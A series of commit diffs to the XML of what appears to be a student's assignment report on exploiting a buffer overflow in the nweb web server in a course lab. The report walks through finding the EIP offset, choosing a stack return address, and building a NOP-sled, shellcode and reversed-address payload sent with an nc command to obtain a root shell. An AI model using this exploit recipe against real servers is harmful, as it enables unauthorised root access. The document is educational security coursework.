<commit_message>
Added Structure of Input to documentation
</commit_message>
<xml_diff>
--- a/BufferOverflowAttacks/Programming Assignment 1 Report.docx
+++ b/BufferOverflowAttacks/Programming Assignment 1 Report.docx
@@ -578,7 +578,135 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">The shell code is 205 bytes, therefore, we added a padding of 825 NOP sleds before the shell code. Now, 825 + 205 = 1030 at which point the input starts overflowing to the EIP where we fill it with an address backwards(Little Endian) which will point to the ESP. The address will be filled with NOP sleds till it reaches our shell code.   </w:t>
+        <w:t>The shell code is 205 bytes, therefore, we added a padding of 825 NOP sleds before the shell code. Now, 825 + 205 = 1030 at which point the input starts overflowing to the EIP where we fill it with an address backwards(Little Endian) which will point to the ESP. The address will be filled with NOP sleds till it reaches our shell code.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>Determining the Parameters used in the Malicious Input</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Firstly, to figure out the buffer length we just keep feeding the program more and more data or you could create an absurdly large pattern using “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>pattern_create</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>” in</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>metasploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> framework. I used a pattern of size 3000 and sent it to the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nweb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> server through </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ncat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">. This created a core dump on our recreation of the environment which told us that there was a segmentation fault with signal 11. Using the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>pattern_offset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">, we figured out </w:t>
       </w:r>
     </w:p>
     <w:p>

</xml_diff>

<commit_message>
Almost done...Need to explain running exploit
</commit_message>
<xml_diff>
--- a/BufferOverflowAttacks/Programming Assignment 1 Report.docx
+++ b/BufferOverflowAttacks/Programming Assignment 1 Report.docx
@@ -441,6 +441,53 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720" w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Now, essentially when I was testing my work, I was running a shell script inside my python program which would create core dumps, however, after talking to the instructors, I think it is essential to understand that the first part of development is to see if your payload works or not, in our case would return a root shell. So, after about a week of using a script, I switched to a process of having my python program print which is then filled into an environment variable “EGG”(Shawn likes eggs) and then using the command “echo GET /$EGG HTTP/1.0 | </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.32.40 8888</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">” to send the malicious input. (Note: after I switched to this method, I had my exploit working within one evening). </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:b/>
@@ -464,64 +511,52 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>The structure of the input is as defined below.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Overflow_string</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = b”\x90”*825 + shellcode + b”\xa0\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>xfa</w:t>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="minorHAnsi" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>ESSENTIALLY:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>overflow_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = b"\x90"*785+buf+b"\x90"*30+b"\xc1\xf7\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>xff</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -537,22 +572,6 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t>xff</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
         <w:t>xbf</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -561,25 +580,150 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>The shell code is 205 bytes, therefore, we added a padding of 825 NOP sleds before the shell code. Now, 825 + 205 = 1030 at which point the input starts overflowing to the EIP where we fill it with an address backwards(Little Endian) which will point to the ESP. The address will be filled with NOP sleds till it reaches our shell code.</w:t>
-      </w:r>
+        <w:t>"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>send_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>b'helloworld</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">' + </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>overflow_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">In the overflow string, first 785 bytes are NOP sleds followed by </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> which is your shell code and then some more NOP sleds and then lastly the redirection address but backwards. Then because you cannot start your string with a NOP sled(it corrupted my input), you create another string, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>send_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>” this string is then put in the environment variable which is then sent over using the GET instruction.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">We look at the NOPs as padding, however, the starting string in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>send_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is also considered padding so that it doesn’t corrupt your sent data. The NOPs are basically instructions that keep passing the baton to the next address. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -707,6 +851,197 @@
           <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve">, we figured out </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">that the saved EIP starts at a distance of 1032. Now, to figure out the architecture, I filled a string with 1032 “A”s and the last 4 bytes with “BCDE”. Upon inspecting the core dump file, the saved EIP was overflowed with “0x45444342”. This step helps us understand that we are working with a Little Endian Architecture and that we have control over what can be written over the EIP. The next part was </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">to figure out what can be a suitable address to overwrite our EIP to and fill those addresses with our shell code. To figure out a suitable memory location we </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">use the command “x/64 $esp-0x__” and then try to work our way upwards to at least 205 bytes, cause that’s how long the shell code is. I worked my way up 0x33F where the memory was filled with As. The memory address I determined to redirect the flow of the code was “0xbffff7c1”. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>Generating Malicious Input</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">The language I used to generate and test my exploit was python for a week which frustrated me and then I switched to C(attached the half developed exploit) for a brief evening before going back to my work in python. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">After figuring out the memory address, where it would be suitable and could fit the entirety of the exploit, you try to reach that address by trying to fill it with characters you can recognize. The input that I sent over after knowing the above information was to create a pattern where I send 827 As, these would represent the NOP sleds, then 205 Fs which would represent the shell code and then 4 Bs, which would be the address to where the redirection of the program would go. Now, in practice those parameters should have worked however, during testing I figured out that it is easier to create a padding before the shell program and after the shell program. Now this process </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">took sometime as when you filled up with the stack with characters, the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>behaviour</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> wouldn’t change. However, when you replace characters with shell code and NOP sleds, you understand if your code runs or not. Essentially, there should be a better way to figure out how to create a perfect padding however, I did it using a trial and error method of wrapping my shell code with a padding of NOP sleds. The formula that essentially worked for me was putting close to enough padding of NOP sleds in the front that it reaches the redirection address, then putting the shell code and then putting padding of NOP sleds till you reach the start of the EIP at which point you put the address in reverse order(cause Little Endian). After you figure out your padding, it took me close to a weekend to realize that when you send your exploit, if a program just receives NOP sleds, it will corrupt your input, or at least that is what happened in my case. The structure for my exploit which </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">is </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>overflow_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = NOP + shell code + NOP+Redirection address. However, when sending the exploit to the server, I created another string, called “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>send_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">”, this string contained some non-trivial string, in my case </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>helloworld</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Since, we added </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>helloworld</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to the start of the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>send_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> you have to subtract that many bytes from your padding. Try to remove it from the padding after the shell code so that you do not have to figure </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">out a new starting NOP padding for your exploit. Now, after similar to the way you were testing while understanding the padding needed, you test to see if your exploit works. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -869,6 +1204,13 @@
           <w:b/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ina – Helped me understand that the NOP sleds are being corrupted and suggested that I add some string before the exploit string. </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>

</xml_diff>

<commit_message>
Only running exploit part is left for documentation
</commit_message>
<xml_diff>
--- a/BufferOverflowAttacks/Programming Assignment 1 Report.docx
+++ b/BufferOverflowAttacks/Programming Assignment 1 Report.docx
@@ -208,6 +208,67 @@
         <w:ind w:left="720"/>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
